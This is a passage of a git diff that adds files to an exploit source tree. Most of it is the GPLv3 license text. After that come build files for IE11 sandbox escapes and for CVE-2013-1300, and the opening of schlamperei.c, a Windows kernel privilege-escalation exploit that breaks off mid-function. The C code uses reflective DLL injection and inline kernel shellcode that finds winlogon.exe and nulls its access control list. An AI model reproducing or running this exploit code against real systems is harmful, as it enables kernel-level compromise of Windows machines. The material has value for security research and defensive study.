+  Developers that use the GNU GPL protect your rights with two steps:
+(1) assert copyright on the software, and (2) offer you this License
+giving you legal permission to copy, distribute and/or modify it.
+
+  For the developers' and authors' protection, the GPL clearly explains
+that there is no warranty for this free software.  For both users' and
+authors' sake, the GPL requires that modified versions be marked as
+changed, so that their problems will not be attributed erroneously to
+authors of previous versions.
+
+  Some devices are designed to deny users access to install or run
+modified versions of the software inside them, although the manufacturer
+can do so.  This is fundamentally incompatible with the aim of
+protecting users' freedom to change the software.  The systematic
+pattern of such abuse occurs in the area of products for individuals to
+use, which is precisely where it is most unacceptable.  Therefore, we
+have designed this version of the GPL to prohibit the practice for those
+products.  If such problems arise substantially in other domains, we
+stand ready to extend this provision to those domains in future versions
+of the GPL, as needed to protect the freedom of users.
+
+  Finally, every program is threatened constantly by software patents.
+States should not allow patents to restrict development and use of
+software on general-purpose computers, but in those that do, we wish to
+avoid the special danger that patents applied to a free program could
+make it effectively proprietary.  To prevent this, the GPL assures that
+patents cannot be used to render the program non-free.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+                       TERMS AND CONDITIONS
+
+  0. Definitions.
+
+  "This License" refers to version 3 of the GNU General Public License.
+
+  "Copyright" also means copyright-like laws that apply to other kinds of
+works, such as semiconductor masks.
+
+  "The Program" refers to any copyrightable work licensed under this
+License.  Each licensee is addressed as "you".  "Licensees" and
+"recipients" may be individuals or organizations.
+
+  To "modify" a work means to copy from or adapt all or part of the work
+in a fashion requiring copyright permission, other than the making of an
+exact copy.  The resulting work is called a "modified version" of the
+earlier work or a work "based on" the earlier work.
+
+  A "covered work" means either the unmodified Program or a work based
+on the Program.
+
+  To "propagate" a work means to do anything with it that, without
+permission, would make you directly or secondarily liable for
+infringement under applicable copyright law, except executing it on a
+computer or modifying a private copy.  Propagation includes copying,
+distribution (with or without modification), making available to the
+public, and in some countries other activities as well.
+
+  To "convey" a work means any kind of propagation that enables other
+parties to make or receive copies.  Mere interaction with a user through
+a computer network, with no transfer of a copy, is not conveying.
+
+  An interactive user interface displays "Appropriate Legal Notices"
+to the extent that it includes a convenient and prominently visible
+feature that (1) displays an appropriate copyright notice, and (2)
+tells the user that there is no warranty for the work (except to the
+extent that warranties are provided), that licensees may convey the
+work under this License, and how to view a copy of this License.  If
+the interface presents a list of user commands or options, such as a
+menu, a prominent item in the list meets this criterion.
+
+  1. Source Code.
+
+  The "source code" for a work means the preferred form of the work
+for making modifications to it.  "Object code" means any non-source
+form of a work.
+
+  A "Standard Interface" means an interface that either is an official
+standard defined by a recognized standards body, or, in the case of
+interfaces specified for a particular programming language, one that
+is widely used among developers working in that language.
+
+  The "System Libraries" of an executable work include anything, other
+than the work as a whole, that (a) is included in the normal form of
+packaging a Major Component, but which is not part of that Major
+Component, and (b) serves only to enable use of the work with that
+Major Component, or to implement a Standard Interface for which an
+implementation is available to the public in source code form.  A
+"Major Component", in this context, means a major essential component
+(kernel, window system, and so on) of the specific operating system
+(if any) on which the executable work runs, or a compiler used to
+produce the work, or an object code interpreter used to run it.
+
+  The "Corresponding Source" for a work in object code form means all
+the source code needed to generate, install, and (for an executable
+work) run the object code and to modify the work, including scripts to
+control those activities.  However, it does not include the work's
+System Libraries, or general-purpose tools or generally available free
+programs which are used unmodified in performing those activities but
+which are not part of the work.  For example, Corresponding Source
+includes interface definition files associated with source files for
+the work, and the source code for shared libraries and dynamically
+linked subprograms that the work is specifically designed to require,
+such as by intimate data communication or control flow between those
+subprograms and other parts of the work.
+
+  The Corresponding Source need not include anything that users
+can regenerate automatically from other parts of the Corresponding
+Source.
+
+  The Corresponding Source for a work in source code form is that
+same work.
+
+  2. Basic Permissions.
+
+  All rights granted under this License are granted for the term of
+copyright on the Program, and are irrevocable provided the stated
+conditions are met.  This License explicitly affirms your unlimited
+permission to run the unmodified Program.  The output from running a
+covered work is covered by this License only if the output, given its
+content, constitutes a covered work.  This License acknowledges your
+rights of fair use or other equivalent, as provided by copyright law.
+
+  You may make, run and propagate covered works that you do not
+convey, without conditions so long as your license otherwise remains
+in force.  You may convey covered works to others for the sole purpose
+of having them make modifications exclusively for you, or provide you
+with facilities for running those works, provided that you comply with
+the terms of this License in conveying all material for which you do
+not control copyright.  Those thus making or running the covered works
+for you must do so exclusively on your behalf, under your direction
+and control, on terms that prohibit them from making any copies of
+your copyrighted material outside their relationship with you.
+
+  Conveying under any other circumstances is permitted solely under
+the conditions stated below.  Sublicensing is not allowed; section 10
+makes it unnecessary.
+
+  3. Protecting Users' Legal Rights From Anti-Circumvention Law.
+
+  No covered work shall be deemed part of an effective technological
+measure under any applicable law fulfilling obligations under article
+11 of the WIPO copyright treaty adopted on 20 December 1996, or
+similar laws prohibiting or restricting circumvention of such
+measures.
+
+  When you convey a covered work, you waive any legal power to forbid
+circumvention of technological measures to the extent such circumvention
+is effected by exercising rights under this License with respect to
+the covered work, and you disclaim any intention to limit operation or
+modification of the work as a means of enforcing, against the work's
+users, your or third parties' legal rights to forbid circumvention of
+technological measures.
+
+  4. Conveying Verbatim Copies.
+
+  You may convey verbatim copies of the Program's source code as you
+receive it, in any medium, provided that you conspicuously and
+appropriately publish on each copy an appropriate copyright notice;
+keep intact all notices stating that this License and any
+non-permissive terms added in accord with section 7 apply to the code;
+keep intact all notices of the absence of any warranty; and give all
+recipients a copy of this License along with the Program.
+
+  You may charge any price or no price for each copy that you convey,
+and you may offer support or warranty protection for a fee.
+
+  5. Conveying Modified Source Versions.
+
+  You may convey a work based on the Program, or the modifications to
+produce it from the Program, in the form of source code under the
+terms of section 4, provided that you also meet all of these conditions:
+
+    a) The work must carry prominent notices stating that you modified
+    it, and giving a relevant date.
+
+    b) The work must carry prominent notices stating that it is
+    released under this License and any conditions added under section
+    7.  This requirement modifies the requirement in section 4 to
+    "keep intact all notices".
+
+    c) You must license the entire work, as a whole, under this
+    License to anyone who comes into possession of a copy.  This
+    License will therefore apply, along with any applicable section 7
+    additional terms, to the whole of the work, and all its parts,
+    regardless of how they are packaged.  This License gives no
+    permission to license the work in any other way, but it does not
+    invalidate such permission if you have separately received it.
+
+    d) If the work has interactive user interfaces, each must display
+    Appropriate Legal Notices; however, if the Program has interactive
+    interfaces that do not display Appropriate Legal Notices, your
+    work need not make them do so.
+
+  A compilation of a covered work with other separate and independent
+works, which are not by their nature extensions of the covered work,
+and which are not combined with it such as to form a larger program,
+in or on a volume of a storage or distribution medium, is called an
+"aggregate" if the compilation and its resulting copyright are not
+used to limit the access or legal rights of the compilation's users
+beyond what the individual works permit.  Inclusion of a covered work
+in an aggregate does not cause this License to apply to the other
+parts of the aggregate.
+
+  6. Conveying Non-Source Forms.
+
+  You may convey a covered work in object code form under the terms
+of sections 4 and 5, provided that you also convey the
+machine-readable Corresponding Source under the terms of this License,
+in one of these ways:
+
+    a) Convey the object code in, or embodied in, a physical product
+    (including a physical distribution medium), accompanied by the
+    Corresponding Source fixed on a durable physical medium
+    customarily used for software interchange.
+
+    b) Convey the object code in, or embodied in, a physical product
+    (including a physical distribution medium), accompanied by a
+    written offer, valid for at least three years and valid for as
+    long as you offer spare parts or customer support for that product
+    model, to give anyone who possesses the object code either (1) a
+    copy of the Corresponding Source for all the software in the
+    product that is covered by this License, on a durable physical
+    medium customarily used for software interchange, for a price no
+    more than your reasonable cost of physically performing this
+    conveying of source, or (2) access to copy the
+    Corresponding Source from a network server at no charge.
+
+    c) Convey individual copies of the object code with a copy of the
+    written offer to provide the Corresponding Source.  This
+    alternative is allowed only occasionally and noncommercially, and
+    only if you received the object code with such an offer, in accord
+    with subsection 6b.
+
+    d) Convey the object code by offering access from a designated
+    place (gratis or for a charge), and offer equivalent access to the
+    Corresponding Source in the same way through the same place at no
+    further charge.  You need not require recipients to copy the
+    Corresponding Source along with the object code.  If the place to
+    copy the object code is a network server, the Corresponding Source
+    may be on a different server (operated by you or a third party)
+    that supports equivalent copying facilities, provided you maintain
+    clear directions next to the object code saying where to find the
+    Corresponding Source.  Regardless of what server hosts the
+    Corresponding Source, you remain obligated to ensure that it is
+    available for as long as needed to satisfy these requirements.
+
+    e) Convey the object code using peer-to-peer transmission, provided
+    you inform other peers where the object code and Corresponding
+    Source of the work are being offered to the general public at no
+    charge under subsection 6d.
+
+  A separable portion of the object code, whose source code is excluded
+from the Corresponding Source as a System Library, need not be
+included in conveying the object code work.
+
+  A "User Product" is either (1) a "consumer product", which means any
+tangible personal property which is normally used for personal, family,
+or household purposes, or (2) anything designed or sold for incorporation
+into a dwelling.  In determining whether a product is a consumer product,
+doubtful cases shall be resolved in favor of coverage.  For a particular
+product received by a particular user, "normally used" refers to a
+typical or common use of that class of product, regardless of the status
+of the particular user or of the way in which the particular user
+actually uses, or expects or is expected to use, the product.  A product
+is a consumer product regardless of whether the product has substantial
+commercial, industrial or non-consumer uses, unless such uses represent
+the only significant mode of use of the product.
+
+  "Installation Information" for a User Product means any methods,
+procedures, authorization keys, or other information required to install
+and execute modified versions of a covered work in that User Product from
+a modified version of its Corresponding Source.  The information must
+suffice to ensure that the continued functioning of the modified object
+code is in no case prevented or interfered with solely because
+modification has been made.
+
+  If you convey an object code work under this section in, or with, or
+specifically for use in, a User Product, and the conveying occurs as
+part of a transaction in which the right of possession and use of the
+User Product is transferred to the recipient in perpetuity or for a
+fixed term (regardless of how the transaction is characterized), the
+Corresponding Source conveyed under this section must be accompanied
+by the Installation Information.  But this requirement does not apply
+if neither you nor any third party retains the ability to install
+modified object code on the User Product (for example, the work has
+been installed in ROM).
+
+  The requirement to provide Installation Information does not include a
+requirement to continue to provide support service, warranty, or updates
+for a work that has been modified or installed by the recipient, or for
+the User Product in which it has been modified or installed.  Access to a
+network may be denied when the modification itself materially and
+adversely affects the operation of the network or violates the rules and
+protocols for communication across the network.
+
+  Corresponding Source conveyed, and Installation Information provided,
+in accord with this section must be in a format that is publicly
+documented (and with an implementation available to the public in
+source code form), and must require no special password or key for
+unpacking, reading or copying.
+
+  7. Additional Terms.
+
+  "Additional permissions" are terms that supplement the terms of this
+License by making exceptions from one or more of its conditions.
+Additional permissions that are applicable to the entire Program shall
+be treated as though they were included in this License, to the extent
+that they are valid under applicable law.  If additional permissions
+apply only to part of the Program, that part may be used separately
+under those permissions, but the entire Program remains governed by
+this License without regard to the additional permissions.
+
+  When you convey a copy of a covered work, you may at your option
+remove any additional permissions from that copy, or from any part of
+it.  (Additional permissions may be written to require their own
+removal in certain cases when you modify the work.)  You may place
+additional permissions on material, added by you to a covered work,
+for which you have or can give appropriate copyright permission.
+
+  Notwithstanding any other provision of this License, for material you
+add to a covered work, you may (if authorized by the copyright holders of
+that material) supplement the terms of this License with terms:
+
+    a) Disclaiming warranty or limiting liability differently from the
+    terms of sections 15 and 16 of this License; or
+
+    b) Requiring preservation of specified reasonable legal notices or
+    author attributions in that material or in the Appropriate Legal
+    Notices displayed by works containing it; or
+
+    c) Prohibiting misrepresentation of the origin of that material, or
+    requiring that modified versions of such material be marked in
+    reasonable ways as different from the original version; or
+
+    d) Limiting the use for publicity purposes of names of licensors or
+    authors of the material; or
+
+    e) Declining to grant rights under trademark law for use of some
+    trade names, trademarks, or service marks; or
+
+    f) Requiring indemnification of licensors and authors of that
+    material by anyone who conveys the material (or modified versions of
+    it) with contractual assumptions of liability to the recipient, for
+    any liability that these contractual assumptions directly impose on
+    those licensors and authors.
+
+  All other non-permissive additional terms are considered "further
+restrictions" within the meaning of section 10.  If the Program as you
+received it, or any part of it, contains a notice stating that it is
+governed by this License along with a term that is a further
+restriction, you may remove that term.  If a license document contains
+a further restriction but permits relicensing or conveying under this
+License, you may add to a covered work material governed by the terms
+of that license document, provided that the further restriction does
+not survive such relicensing or conveying.
+
+  If you add terms to a covered work in accord with this section, you
+must place, in the relevant source files, a statement of the
+additional terms that apply to those files, or a notice indicating
+where to find the applicable terms.
+
+  Additional terms, permissive or non-permissive, may be stated in the
+form of a separately written license, or stated as exceptions;
+the above requirements apply either way.
+
+  8. Termination.
+
+  You may not propagate or modify a covered work except as expressly
+provided under this License.  Any attempt otherwise to propagate or
+modify it is void, and will automatically terminate your rights under
+this License (including any patent licenses granted under the third
+paragraph of section 11).
+
+  However, if you cease all violation of this License, then your
+license from a particular copyright holder is reinstated (a)
+provisionally, unless and until the copyright holder explicitly and
+finally terminates your license, and (b) permanently, if the copyright
+holder fails to notify you of the violation by some reasonable means
+prior to 60 days after the cessation.
+
+  Moreover, your license from a particular copyright holder is
+reinstated permanently if the copyright holder notifies you of the
+violation by some reasonable means, this is the first time you have
+received notice of violation of this License (for any work) from that
+copyright holder, and you cure the violation prior to 30 days after
+your receipt of the notice.
+
+  Termination of your rights under this section does not terminate the
+licenses of parties who have received copies or rights from you under
+this License.  If your rights have been terminated and not permanently
+reinstated, you do not qualify to receive new licenses for the same
+material under section 10.
+
+  9. Acceptance Not Required for Having Copies.
+
+  You are not required to accept this License in order to receive or
+run a copy of the Program.  Ancillary propagation of a covered work
+occurring solely as a consequence of using peer-to-peer transmission
+to receive a copy likewise does not require acceptance.  However,
+nothing other than this License grants you permission to propagate or
+modify any covered work.  These actions infringe copyright if you do
+not accept this License.  Therefore, by modifying or propagating a
+covered work, you indicate your acceptance of this License to do so.
+
+  10. Automatic Licensing of Downstream Recipients.
+
+  Each time you convey a covered work, the recipient automatically
+receives a license from the original licensors, to run, modify and
+propagate that work, subject to this License.  You are not responsible
+for enforcing compliance by third parties with this License.
+
+  An "entity transaction" is a transaction transferring control of an
+organization, or substantially all assets of one, or subdividing an
+organization, or merging organizations.  If propagation of a covered
+work results from an entity transaction, each party to that
+transaction who receives a copy of the work also receives whatever
+licenses to the work the party's predecessor in interest had or could
+give under the previous paragraph, plus a right to possession of the
+Corresponding Source of the work from the predecessor in interest, if
+the predecessor has it or can get it with reasonable efforts.
+
+  You may not impose any further restrictions on the exercise of the
+rights granted or affirmed under this License.  For example, you may
+not impose a license fee, royalty, or other charge for exercise of
+rights granted under this License, and you may not initiate litigation
+(including a cross-claim or counterclaim in a lawsuit) alleging that
+any patent claim is infringed by making, using, selling, offering for
+sale, or importing the Program or any portion of it.
+
+  11. Patents.
+
+  A "contributor" is a copyright holder who authorizes use under this
+License of the Program or a work on which the Program is based.  The
+work thus licensed is called the contributor's "contributor version".
+
+  A contributor's "essential patent claims" are all patent claims
+owned or controlled by the contributor, whether already acquired or
+hereafter acquired, that would be infringed by some manner, permitted
+by this License, of making, using, or selling its contributor version,
+but do not include claims that would be infringed only as a
+consequence of further modification of the contributor version.  For
+purposes of this definition, "control" includes the right to grant
+patent sublicenses in a manner consistent with the requirements of
+this License.
+
+  Each contributor grants you a non-exclusive, worldwide, royalty-free
+patent license under the contributor's essential patent claims, to
+make, use, sell, offer for sale, import and otherwise run, modify and
+propagate the contents of its contributor version.
+
+  In the following three paragraphs, a "patent license" is any express
+agreement or commitment, however denominated, not to enforce a patent
+(such as an express permission to practice a patent or covenant not to
+sue for patent infringement).  To "grant" such a patent license to a
+party means to make such an agreement or commitment not to enforce a
+patent against the party.
+
+  If you convey a covered work, knowingly relying on a patent license,
+and the Corresponding Source of the work is not available for anyone
+to copy, free of charge and under the terms of this License, through a
+publicly available network server or other readily accessible means,
+then you must either (1) cause the Corresponding Source to be so
+available, or (2) arrange to deprive yourself of the benefit of the
+patent license for this particular work, or (3) arrange, in a manner
+consistent with the requirements of this License, to extend the patent
+license to downstream recipients.  "Knowingly relying" means you have
+actual knowledge that, but for the patent license, your conveying the
+covered work in a country, or your recipient's use of the covered work
+in a country, would infringe one or more identifiable patents in that
+country that you have reason to believe are valid.
+
+  If, pursuant to or in connection with a single transaction or
+arrangement, you convey, or propagate by procuring conveyance of, a
+covered work, and grant a patent license to some of the parties
+receiving the covered work authorizing them to use, propagate, modify
+or convey a specific copy of the covered work, then the patent license
+you grant is automatically extended to all recipients of the covered
+work and works based on it.
+
+  A patent license is "discriminatory" if it does not include within
+the scope of its coverage, prohibits the exercise of, or is
+conditioned on the non-exercise of one or more of the rights that are
+specifically granted under this License.  You may not convey a covered
+work if you are a party to an arrangement with a third party that is
+in the business of distributing software, under which you make payment
+to the third party based on the extent of your activity of conveying
+the work, and under which the third party grants, to any of the
+parties who would receive the covered work from you, a discriminatory
+patent license (a) in connection with copies of the covered work
+conveyed by you (or copies made from those copies), or (b) primarily
+for and in connection with specific products or compilations that
+contain the covered work, unless you entered into that arrangement,
+or that patent license was granted, prior to 28 March 2007.
+
+  Nothing in this License shall be construed as excluding or limiting
+any implied license or other defenses to infringement that may
+otherwise be available to you under applicable patent law.
+
+  12. No Surrender of Others' Freedom.
+
+  If conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot convey a
+covered work so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you may
+not convey it at all.  For example, if you agree to terms that obligate you
+to collect a royalty for further conveying from those to whom you convey
+the Program, the only way you could satisfy both those terms and this
+License would be to refrain entirely from conveying the Program.
+
+  13. Use with the GNU Affero General Public License.
+
+  Notwithstanding any other provision of this License, you have
+permission to link or combine any covered work with a work licensed
+under version 3 of the GNU Affero General Public License into a single
+combined work, and to convey the resulting work.  The terms of this
+License will continue to apply to the part which is the covered work,
+but the special requirements of the GNU Affero General Public License,
+section 13, concerning interaction through a network will apply to the
+combination as such.
+
+  14. Revised Versions of this License.
+
+  The Free Software Foundation may publish revised and/or new versions of
+the GNU General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+  Each version is given a distinguishing version number.  If the
+Program specifies that a certain numbered version of the GNU General
+Public License "or any later version" applies to it, you have the
+option of following the terms and conditions either of that numbered
+version or of any later version published by the Free Software
+Foundation.  If the Program does not specify a version number of the
+GNU General Public License, you may choose any version ever published
+by the Free Software Foundation.
+
+  If the Program specifies that a proxy can decide which future
+versions of the GNU General Public License can be used, that proxy's
+public statement of acceptance of a version permanently authorizes you
+to choose that version for the Program.
+
+  Later license versions may give you additional or different
+permissions.  However, no additional obligations are imposed on any
+author or copyright holder as a result of your choosing to follow a
+later version.
+
+  15. Disclaimer of Warranty.
+
+  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
+APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
+HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
+OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
+THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
+IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
+ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
+
+  16. Limitation of Liability.
+
+  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
+THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
+GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
+USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
+DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
+PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
+EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGES.
+
+  17. Interpretation of Sections 15 and 16.
+
+  If the disclaimer of warranty and limitation of liability provided
+above cannot be given local legal effect according to their terms,
+reviewing courts shall apply local law that most closely approximates
+an absolute waiver of all civil liability in connection with the
+Program, unless a warranty or assumption of liability accompanies a
+copy of the Program in return for a fee.
+
+                     END OF TERMS AND CONDITIONS
+
+            How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+state the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    {one line to give the program's name and a brief idea of what it does.}
+    Copyright (C) {year}  {name of author}
+
+    This program is free software: you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation, either version 3 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+Also add information on how to contact you by electronic and paper mail.
+
+  If the program does terminal interaction, make it output a short
+notice like this when it starts in an interactive mode:
+
+    {project}  Copyright (C) {year}  {fullname}
+    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+    This is free software, and you are welcome to redistribute it
+    under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License.  Of course, your program's commands
+might be different; for a GUI interface, you would use an "about box".
+
+  You should also get your employer (if you work as a programmer) or school,
+if any, to sign a "copyright disclaimer" for the program, if necessary.
+For more information on this, and how to apply and follow the GNU GPL, see
+<http://www.gnu.org/licenses/>.
+
+  The GNU General Public License does not permit incorporating your program
+into proprietary programs.  If your program is a subroutine library, you
+may consider it more useful to permit linking proprietary applications with
+the library.  If this is what you want to do, use the GNU Lesser General
+Public License instead of this License.  But first, please read
+<http://www.gnu.org/philosophy/why-not-lgpl.html>.
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/README.md b/external/source/exploits/IE11SandboxEscapes/README.md
new file mode 100755
index 0000000000..a51ddd8491
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/README.md
@@ -0,0 +1,10 @@
+IE11SandboxEscapes
+==================
+
+Some example source code for fixed IE11 sandbox escapes.
+
+(c) James Forshaw 2014
+
+For information purposes only.
+
+All files are licensed under GPLv3. See LICENSE for more information.
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/make.msbuild b/external/source/exploits/IE11SandboxEscapes/make.msbuild
new file mode 100755
index 0000000000..e2ca621d10
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/make.msbuild
@@ -0,0 +1,18 @@
+<?xml version="1.0" standalone="yes"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <SolutionPath>.\IE11SandboxEscapes.sln</SolutionPath>
+  </PropertyGroup>
+
+  <Target Name="all" DependsOnTargets="x86" />
+
+  <Target Name="x86">
+    <Message Text="Building IE11SandboxEscapes x86 Release version" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
+  </Target>
+
+  <Target Name="x64">
+    <Message Text="IE11SandboxEscapes not supported in x64" />
+  </Target>
+</Project>
+
diff --git a/external/source/exploits/cve-2013-1300/cve-2013-1300.sln b/external/source/exploits/cve-2013-1300/cve-2013-1300.sln
new file mode 100755
index 0000000000..c1eb1c9cdc
--- /dev/null
+++ b/external/source/exploits/cve-2013-1300/cve-2013-1300.sln
@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "schlamperei", "schlamperei\schlamperei.vcxproj", "{C093C490-61BF-433E-AEB4-80753B20DEC7}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{C093C490-61BF-433E-AEB4-80753B20DEC7}.Debug|Win32.ActiveCfg = Debug|Win32
+		{C093C490-61BF-433E-AEB4-80753B20DEC7}.Debug|Win32.Build.0 = Debug|Win32
+		{C093C490-61BF-433E-AEB4-80753B20DEC7}.Release|Win32.ActiveCfg = Release|Win32
+		{C093C490-61BF-433E-AEB4-80753B20DEC7}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
diff --git a/external/source/exploits/cve-2013-1300/make.msbuild b/external/source/exploits/cve-2013-1300/make.msbuild
new file mode 100644
index 0000000000..c18153ec01
--- /dev/null
+++ b/external/source/exploits/cve-2013-1300/make.msbuild
@@ -0,0 +1,17 @@
+<?xml version="1.0" standalone="yes"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <SolutionPath>.\cve-2013-1300.sln</SolutionPath>
+  </PropertyGroup>
+
+  <Target Name="all" DependsOnTargets="x86" />
+
+  <Target Name="x86">
+    <Message Text="Building CVE-2013-1300 Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei) x86 Release version" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
+  </Target>
+
+  <Target Name="x64">
+    <Message Text="CVE-2013-1300 is not supported in x64" />
+  </Target>
+</Project>
diff --git a/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c
new file mode 100755
index 0000000000..c7fea10a62
--- /dev/null
+++ b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c
@@ -0,0 +1,291 @@
+/*!
+ * @file dllmain.cpp
+ * @brief Exploit for CVE-2013-1300 aka ms13-053
+ * @detail Tested on Windows 7 32-bit.
+ *         Used in pwn2own 2013 to break out of chrome's sandbox.
+ *         Found and exploited by nils and jon of @mwrlabs.
+ */
+
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
+
+// Purloined from ntstatus.h
+#define STATUS_SUCCESS                          ((NTSTATUS)0x00000000L) // ntsubauth
+
+#define WIN32_NO_STATUS
+#include <windows.h>
+#undef WIN32_NO_STATUS
+
+#ifndef _NTDEF_
+typedef __success(return >= 0) LONG NTSTATUS;
+typedef NTSTATUS *PNTSTATUS;
+#endif
+
+#define MAX_PAGE 4096
+
+#define TABLE_BASE 0xff910000
+
+#define EXPLOIT_MSG WM_GETTEXT
+
+// global variables FTW
+HWND gHwnd = 0x0;
+unsigned int gEPROCESS = 0x0;
+unsigned gPid = 0x0;
+
+typedef struct _HANDLEENTRY {
+	VOID *phead;
+	VOID *pOwner;
+	UINT8 bType;
+	UINT8 bFlags;
+	UINT16 wUniq;
+} HANDLEENTRY, *PHANDLEENTRY;
+
+DWORD gethandleaddress(HANDLE h) {
+	HMODULE mod = GetModuleHandleA("user32.dll");
+	DWORD* sharedinfo = (DWORD*)GetProcAddress(mod, "gSharedInfo");
+	PHANDLEENTRY handles = (PHANDLEENTRY)sharedinfo[1];
+	DWORD index = (DWORD)h&0x3ff;
+	HANDLEENTRY entry = handles[index];
+	return (DWORD)entry.phead;
+}
+
+DWORD kernelwndproc(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam) {
+	WORD um=0;
+	__asm {
+		mov ax, cs
+		mov um, ax
+	}
+	if(um == 0x1b) {
+		
+	} else {
+		// KERNEL MODE CODE EXECUTION
+		// shellcode to change ACL of winlogon.exe to 0x0
+		__asm {
+				mov eax, hwnd // WND
+				mov eax, [eax+8] // THREADINFO
+				mov eax, [eax] // ETHREAD
+				mov eax, [eax+0x150] // KPROCESS
+				mov eax, [eax+0xb8] // flink
+				procloop:
+				lea edx, [eax-0xb8] // KPROCESS
+				mov eax, [eax]
+				add edx, 0x16c // module name
+				cmp dword ptr [edx], 0x6c6e6977 // "winl" for winlogon.exe
+				jne procloop
+				sub edx, 0x170
+				mov dword ptr [edx], 0x0 // null acl
+				mov eax, [edx + 0xb8]   // write winlogon pid to global var
+				mov gPid, eax
+		}
+		return 0x201000;
+	}
+	return DefWindowProcW(hwnd,msg,wparam,lparam);
+}
+
+HWND createhelperwnd() {
+	WNDCLASSA wndclass;
+	HANDLE hinst = GetModuleHandleA(0);
+	DWORD rc = 0;
+	
+	wndclass.style         = 0x4000;
+	wndclass.lpfnWndProc   = (WNDPROC)kernelwndproc;
+	wndclass.cbClsExtra    = 0;
+	wndclass.cbWndExtra    = 0;
+	wndclass.hInstance     = (HINSTANCE)hinst;
+	wndclass.hIcon         = LoadIconA(0, (LPCSTR)0x107);
+	wndclass.hCursor       = 0;
+	wndclass.hbrBackground = (HBRUSH)6;
+	wndclass.lpszMenuName  = 0;
+	wndclass.lpszClassName = (LPCSTR) 0x1338;
+	rc=RegisterClassA(&wndclass);
+	HWND windowhandle = CreateWindowExA(0, (LPCSTR) 0x1338, "helper", 0, 0, 0, 0, 0, 0, 0, 0, hinst);
+
+	return windowhandle;
+}
+
+typedef NTSTATUS __stdcall NtAllocateVirtualMemory_T(HANDLE processHandle, 
+                                           PVOID      *baseAddress, 
+                                           ULONG_PTR  zeroBits, 
+                                           PSIZE_T    regionSize, 
+                                           ULONG      allocationType, 
+                                           ULONG      protect);
+
+BOOL AllocFakeEProcess(DWORD address) {
+	unsigned int addr = 0x200000;
